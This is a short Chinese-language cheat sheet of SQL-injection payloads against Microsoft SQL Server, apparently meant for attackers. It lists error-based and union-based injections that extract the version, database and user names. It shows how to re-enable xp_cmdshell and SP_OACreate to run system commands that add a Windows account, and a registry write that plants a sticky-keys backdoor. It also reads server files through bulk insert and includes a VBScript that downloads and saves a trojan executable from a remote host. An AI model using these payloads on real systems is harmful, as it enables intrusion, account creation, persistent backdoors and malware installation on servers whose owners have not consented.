mssql权限:SA,DB_OWNER,PUBLIC
判断权限的语句:
SA权限: and 1 = (select IS_SRVROLEMEMBER('sysadmin'))
DB_OWNER权限: and 1 = (select IS_SRVROLEMEMBER('db_owner'))
PUBLIC权限: and 1 =1 (select IS_SRVROLEMEMBER('public'))
有错误回显:
判断数据库版本号及操作系统类型
and 1 = convert(int,@@version)
得到数据库名
and 1 = convert(int,db_name()) and '1' = '1'
得到当前用户名
and 1 = convert(int,user_name()) and '1' = '1'
检测xp_cmdshell存储过程是否存在
' and 1 = (select count(*) from master.dbo,sysobjects where xtype = 'X' AND name = 'xp_cmdshell') and '1' ='1
恢复xp_cmdshell
EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'
EXEC master.dbo.sp_addextendedproc
'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'
利用xp_cmdshell添加账户
http://www.xxx.com/xx.asp?xx=xx';exec master..xp_cmdshell 'net user test test /add'
利用SP_OACreate过程添加账户
DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC
SP_OAMETHOD @shell,'run',NULL,'c:\windows\system32\cmd.exe /c net user test test /add'
映像支持(点5次shift键进系统)
http://www.xxx.com/xx.asp?xx=xx';exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\\MICROSOFT\\Windows NT\\CurrentVersion\\Image File Execution Option\\sethc.exe','debuger','REG_SZ','c:\\windows\\explorer.exe'
SA权限下读取文件
http://www.xxx.com/xx/asp?xx=xx;create%20table%20mydata%20(line%20varchar(80000));--
http://www.xxx.com/xx/asp?xx=xx;bulk%20insert%20mydata%20from%20%27c:\boot.ini%27;--
http://www.xxx.com/xx/asp?xx=xx;%20and%201=convert(int,(select%20top%201%20line%20from%20mydata))
通过vbs来下载木马
set xPost = CreateOject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.xx.com/d.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Type = 1
sGet.open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\d.exe",2
无错误回显:
通过order by确定字段数目
http://www.xx.com/index.jsp?id=121 order by 5
得到数据库版本和系统类型
http://www.xx.com/index.jsp?id=121%20and%201=2%20union%20select%201,2,3,4,5,6,7,8.....
如果页面显示为2
http://www.xx.com/index.jsp?id=121%20and%201=2%20union%20select%201,@@version,3,4,5,6,7,8